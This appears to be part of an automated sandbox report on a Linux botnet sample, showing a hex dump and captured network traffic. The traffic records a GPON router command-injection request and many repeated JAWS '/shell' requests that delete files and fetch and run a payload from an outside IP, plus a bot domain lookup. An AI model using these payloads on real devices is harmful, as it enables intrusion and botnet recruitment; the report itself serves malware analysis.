5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
      Source: yRo17s2SbcString found in binary or memory: http://199.195.250.211/bin
      Source: yRo17s2SbcString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: yRo17s2SbcString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 70 6f 6e 34 34 33 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://199.195.250.211/bin+-O+/tmp/gpon443;sh+/tmp/gpon443`&ipv=0
      Source: unknownDNS traffic detected: queries for: bot.zuurry.net
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
